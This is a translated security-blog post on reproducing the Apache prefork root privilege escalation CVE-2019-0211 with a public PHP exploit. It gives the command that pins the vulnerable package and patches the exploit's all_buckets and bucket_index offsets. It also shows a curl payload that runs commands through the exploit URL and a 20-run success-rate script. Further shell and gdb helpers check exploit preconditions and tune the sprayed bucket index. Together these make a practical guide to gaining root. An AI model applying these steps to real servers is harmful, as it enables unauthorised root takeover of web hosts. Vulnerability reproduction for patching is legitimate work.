Pitfalls in reproducing the Apache privilege escalation vulnerability (CVE-2019-0211) - Vulnerability Alert - 黑吧安全网 (myhack58)

Author: 佚名 (anonymous)
Published: 2019-04-15, www.myhack58.com (MYHACK58:62201993655)
EPSS: 0.961 (percentile 99.5%)

This month a privilege escalation vulnerability in Apache was disclosed, and the day before yesterday a working exploit script was published on GitHub; over the past few days I have been responsible for the emergency response to this vulnerability.
This article is not titled "analysis of the Apache privilege escalation vulnerability" because I think cfreal's CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation already analyses it well, so there is no need for me to translate it yet again. This article mainly describes the pitfalls I stepped into while reproducing the vulnerability.
Reproduction environment
The environment I used for reproduction:

Operating system (the distribution matters little; the main problem is that the package manager will not install the vulnerable Apache version by default)

$ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic

Apache version (this exact version is the key to reproducing)

$ apache2 -v
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2018-03-02T02:19:31

PHP version

$ php -v
PHP 7.2.15-0ubuntu0.18.04.2 (cli) (built: Mar 22 2019 17:05:14) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.2.15-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies

The apache2 build that apt installs by default is already the patched one, so the vulnerable version must be pinned explicitly:

# apt install apache2=2.4.29-1ubuntu4 apache2-bin=2.4.29-1ubuntu4 apache2-utils=2.4.29-1ubuntu4 apache2-data=2.4.29-1ubuntu4

PHP can be installed directly with apt.
Exploit: https://github.com/cfreal/exploits/blob/master/CVE-2019-0211-apache/cfreal-carpediem.php
The ssl module has to be enabled: a2enmod ssl
Why the ssl module is needed:
Even without the ssl module, the vulnerability is still present.
If ssl is not enabled but another port is opened in the Apache configuration, exploitation still works.
If only port 80 is open, a separate exploit chain has to be found; the exploit published on GitHub does not work when only one port is open.
cfreal's article already says this; I will only add one remark. The relevant code is at [1] and [2]; here is the SAFE_ACCEPT macro definition from the prefork MPM (server/mpm/prefork/prefork.c):
/* On some architectures it's safe to do unserialized accept()s in the single
 * Listen case.  But it's never safe to do it in the case where there's
 * multiple Listen statements.  Define SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 * when it's safe in the single Listen case.
 */
#ifdef SINGLE_LISTEN_UNSERIALIZED_ACCEPT
#define SAFE_ACCEPT(stmt) (ap_listeners->next ? (stmt) : APR_SUCCESS)
#else
#define SAFE_ACCEPT(stmt) (stmt)
#endif

In short: this build evidently has SINGLE_LISTEN_UNSERIALIZED_ACCEPT defined, so the statement wrapped by SAFE_ACCEPT only runs when Apache listens on more than one port (ap_listeners->next is non-NULL). That statement is the child's accept-mutex initialisation, apr_proc_mutex_child_init(&my_bucket->mutex, ...), which ends in an indirect call through the mutex object's method table, and that mutex object is exactly what the exploit published on GitHub abuses: make_child sets my_bucket = &all_buckets[bucket] from an index the worker can overwrite in the shared scoreboard, so a forged index makes the child dereference an attacker-controlled mutex. With a single Listen the call is never made and the chain breaks.
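As an added example (not from the original post or from cfreal's exploit), the following shell helper counts the Listen directives Apache would actually apply from a ports.conf-style file, honouring <IfModule> and <IfModule !module> blocks, so you can tell before running the exploit whether ap_listeners->next will be non-NULL. The config path and the list of enabled modules are supplied by the caller (assumed inputs); the helper does not follow Include directives.

```shell
#!/bin/bash
# Added example: count the Listen directives Apache will apply, honouring
# <IfModule module> / <IfModule !module> blocks. When the result is >= 2,
# ap_listeners->next is non-NULL and SAFE_ACCEPT() runs the mutex statement
# that the published exploit hijacks. Include directives are not followed.

# usage: effective_listeners CONFIG_FILE [ENABLED_MODULE ...]
# Module identifiers are written as in the config, e.g. ssl_module or mod_ssl.c.
effective_listeners() {
    local conf=$1
    shift
    awk -v mods="$*" '
    BEGIN {
        n = split(mods, arr, " ")
        for (i = 1; i <= n; i++) enabled[arr[i]] = 1
        depth = 0; skip = 0; count = 0
    }
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        if (line == "" || line ~ /^#/) next
        if (line ~ /^<[Ii]f[Mm]odule[ \t]/) {
            mod = line
            sub(/^<[Ii]f[Mm]odule[ \t]+/, "", mod)
            sub(/[ \t]*>.*$/, "", mod)
            negate = (substr(mod, 1, 1) == "!")
            if (negate) mod = substr(mod, 2)
            depth++
            # remember the depth at which an inactive block started; everything
            # inside it (nested blocks included) is ignored until it closes
            if (skip == 0 && ((mod in enabled) == negate)) skip = depth
            next
        }
        if (line ~ /^<\/[Ii]f[Mm]odule>/) {
            if (skip == depth) skip = 0
            depth--
            next
        }
        if (skip == 0 && line ~ /^[Ll]isten[ \t]/) count++
    }
    END { print count }' "$conf"
}

# usage: exploit_precondition CONFIG_FILE [ENABLED_MODULE ...]
# exit 0 when the multi-listener precondition holds, 1 otherwise
exploit_precondition() {
    local n
    n=$(effective_listeners "$@")
    if [ "$n" -ge 2 ]; then
        echo "multiple listeners ($n): accept mutex is created, exploit path reachable"
        return 0
    fi
    echo "single listener: SAFE_ACCEPT() skips the mutex, published exploit will not work"
    return 1
}
```

On a live box the enabled modules can be taken from apache2ctl -M, e.g. effective_listeners /etc/apache2/ports.conf $(apache2ctl -M 2>/dev/null | awk '/_module/ {print $1}'); the Ubuntu ports.conf used here gives 1 without ssl and 2 once a2enmod ssl adds ssl_module. A runtime cross-check is ss -ltnp | grep apache2, which prints one line per listening socket.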

Pitfalls encountered running the exploit
I tried many versions and not one could run the GitHub exploit unmodified. On the release above, debugging turned up two calculations that made exploitation fail:
$all_buckets = $i - 0x10 is miscalculated
$bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2); is miscalculated
For the first, the all_buckets address: debugging with gdb shows that this value is not actually computed wrong, but after apache2ctl graceful runs, all_buckets is allocated afresh, and the new address differs from the old one by exactly 0x38000. So the fix is easy:
$all_buckets = $i - 0x10 + 0x38000;
(The offset is what I measured on the build above; on another build, verify it with gdb as described in the summary.)
The second calculation does not need to be that complicated, and in my test version it still produced a wrong address, so I replaced it with simply:
$bucket_index = $bucket_index_middle;

A pitfall on Ubuntu
My payload was: curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/2323232"
On the surface it executed successfully, but there was no file 2323232 under /tmp. Further investigation showed that systemd gives Apache a private tmp directory: running find /tmp -name "2323232" does turn up the file (under /tmp/systemd-private-*-apache2.service-*/tmp/), but only root can access it. If you do not want systemd to redirect the tmp directory, that is also simple:
$ cat /lib/systemd/system/apache2.service
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target
[Service]
Type=forking
Environment=APACHE_STARTED_BY_SYSTEMD=true
ExecStart=/usr/sbin/apachectl start
ExecStop=/usr/sbin/apachectl stop
ExecReload=/usr/sbin/apachectl graceful
PrivateTmp=false
Restart=on-abort
[Install]
WantedBy=multi-user.target
The unit shown here has already been edited to PrivateTmp=false (the packaged unit ships with PrivateTmp=true). After the change, run systemctl daemon-reload, restart apache2, and test writing to /tmp again. Editing the file under /lib/systemd/system directly is undone by the next package upgrade; a drop-in created with systemctl edit apache2 containing the same [Service] / PrivateTmp=false lines survives it.
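As an added example (not part of the original post), these shell helpers do what the paragraph above did by hand: read the PrivateTmp= setting out of a unit file, and locate the payload's output file inside the private tmp that systemd creates for the service. The directory naming scheme /tmp/systemd-private-<boot-id>-<unit>-<random>/tmp is systemd's own; the TMP_ROOT parameter is an assumption added only so the functions can be exercised on a constructed directory tree.

```shell
#!/bin/bash
# Added example: work out where a payload's output really went when the
# service runs with PrivateTmp. Assumes systemd's naming scheme
# /tmp/systemd-private-<boot-id>-<unit>-<random>/tmp for the private tmp.

# usage: unit_private_tmp UNIT_FILE   -> prints "true" or "false"
# Parses the [Service] section; the last PrivateTmp= wins, the default is false.
unit_private_tmp() {
    awk -F= '
    /^[ \t]*\[/ { section = $0; next }
    section ~ /^\[Service\]/ && $1 ~ /^[ \t]*PrivateTmp[ \t]*$/ {
        v = tolower($2)
        gsub(/[ \t]/, "", v)
        last = (v == "true" || v == "yes" || v == "on" || v == "1") ? "true" : "false"
    }
    END { if (last == "") last = "false"; print last }' "$1"
}

# usage: service_tmp_dirs UNIT_NAME [TMP_ROOT]
# Lists the private tmp directories systemd created for the unit (TMP_ROOT
# defaults to /tmp; it is a parameter only so the function can be tested).
service_tmp_dirs() {
    local unit=$1 root=${2:-/tmp}
    find "$root" -maxdepth 1 -type d -name "systemd-private-*-$unit-*" 2>/dev/null |
        sed 's|$|/tmp|'
}

# usage: find_payload_output UNIT_NAME FILENAME [TMP_ROOT]
# Prints the real path of FILENAME, looking first in the shared tmp, then in
# every private tmp of the unit. Exit 1 if the payload produced nothing.
find_payload_output() {
    local unit=$1 name=$2 root=${3:-/tmp} d
    if [ -e "$root/$name" ]; then
        echo "$root/$name"
        return 0
    fi
    for d in $(service_tmp_dirs "$unit" "$root"); do
        if [ -e "$d/$name" ]; then
            echo "$d/$name"
            return 0
        fi
    done
    return 1
}
```

Run find_payload_output as root, since the private tmp is only readable by root, e.g. find_payload_output apache2.service 2323232. For a running unit, systemctl show -p PrivateTmp apache2.service reports the effective setting without parsing the file.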

About the success rate
The notes in the exploit say it does not succeed 100% of the time, with some probability of failure, so I wrote a script to test it (it relies on PrivateTmp=false from the previous section, otherwise the marker file lands in the private tmp):
root@vultr:~# cat check
#!/bin/bash
# Restart Apache, fire the exploit, trigger the graceful restart it needs,
# then count whether the payload's marker file appeared in /tmp.
SUCC=0
COUNT=0
for i in $(seq 1 20)
do
let COUNT+=1
/etc/init.d/apache2 stop
sleep 1
/etc/init.d/apache2 start
if [ -f "/tmp/1982347" ]; then
rm /tmp/1982347
fi
curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/1982347"
apache2ctl graceful
sleep 1
if [ -f "/tmp/1982347" ]; then
let SUCC+=1
fi
done
echo "COUNT: $COUNT"
echo "SUCCESS: $SUCC"
The results of my 20 runs:

./check
COUNT: 20
SUCCESS: 20

I did not encounter a single failure.

Summary
I have not tested other versions, but here is some advice.
Checking the all_buckets address is quite simple. After running the exploit, take the pid and the all_buckets address from its output, attach gdb to that process and check whether the address is correct with: p all_buckets
Note that the debug symbol package must be installed first, otherwise the all_buckets symbol is not available: apt install apache2-dbg=2.4.29-1ubuntu4. If the value is wrong, debug the exploit's search for the all_buckets address.
If it is correct, attach gdb to the main process (the one running as root), set a breakpoint on make_child, and run apache2ctl graceful. When execution stops in make_child, print p all_buckets and compare it with the value the exploit obtained; if they match, all is well.
Checking the my_bucket address: the steps are the same as above, and the point to watch is the assignment of my_bucket in make_child (my_bucket = &all_buckets[bucket], reference [3]). Because make_child forks, gdb also needs: set follow-fork-mode child
my_bucket should be a pointer into the heap-sprayed region. If its value is correct the exploit will basically work; if not, adjust $bucket_index.
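As an added example (not part of the original post or of the exploit), the following helpers wrap the gdb procedure just described: one generates the gdb command sequence (attach to the root parent, break in make_child, follow the fork into child_main, print all_buckets, my_bucket and the index between them), and two small functions do the index arithmetic for adjusting $bucket_index. The 0x18-byte bucket size is an assumption: prefork_child_bucket holds three pointers (pod, listeners, mutex) on x86-64. apache2-dbg must be installed for the symbols to resolve.

```shell
#!/bin/bash
# Added example: helpers for the gdb checks above. Assumptions: x86-64, the
# apache2-dbg symbols are installed, and prefork's prefork_child_bucket is three
# pointers (pod, listeners, mutex), so each all_buckets[] element is 0x18 bytes.
BUCKET_SIZE=24

# Index make_child must receive so that &all_buckets[index] lands on TARGET.
# usage: bucket_index_for TARGET_ADDR ALL_BUCKETS_ADDR   (hex 0x... or decimal)
# Truncates toward zero like C integer division; the result may be negative.
bucket_index_for() {
    echo $(( ($1 - $2) / BUCKET_SIZE ))
}

# Reverse check: the address my_bucket will hold for a given index.
# usage: my_bucket_for ALL_BUCKETS_ADDR INDEX
my_bucket_for() {
    printf '0x%x\n' $(( $1 + $2 * BUCKET_SIZE ))
}

# gdb command file: stop in the parent's make_child, then follow the forked
# child into child_main and show the bucket it was handed. The first make_child
# call after attaching (normally the first worker spawned by apache2ctl
# graceful) is the one examined; type "continue" to look at the next one.
gdb_check_commands() {
    cat <<'EOF'
set pagination off
set follow-fork-mode child
break make_child
continue
printf "parent: all_buckets = %p\n", all_buckets
break child_main
continue
printf "child: my_bucket = %p, index %ld\n", my_bucket, (long)(my_bucket - all_buckets)
print *my_bucket
print my_bucket->mutex
EOF
}

# usage: run_gdb_check PARENT_PID   (then run `apache2ctl graceful` from another shell)
run_gdb_check() {
    local cmds
    cmds=$(mktemp)
    gdb_check_commands > "$cmds"
    gdb -q -p "$1" -x "$cmds"
    rm -f "$cmds"
}
```

Compare the parent's all_buckets with the value the exploit printed; the difference is the offset the section above hard-codes as 0x38000. Then bucket_index_for <spray address> <all_buckets> gives the index the scoreboard must carry, and my_bucket_for confirms what make_child will dereference for the index the child actually reports.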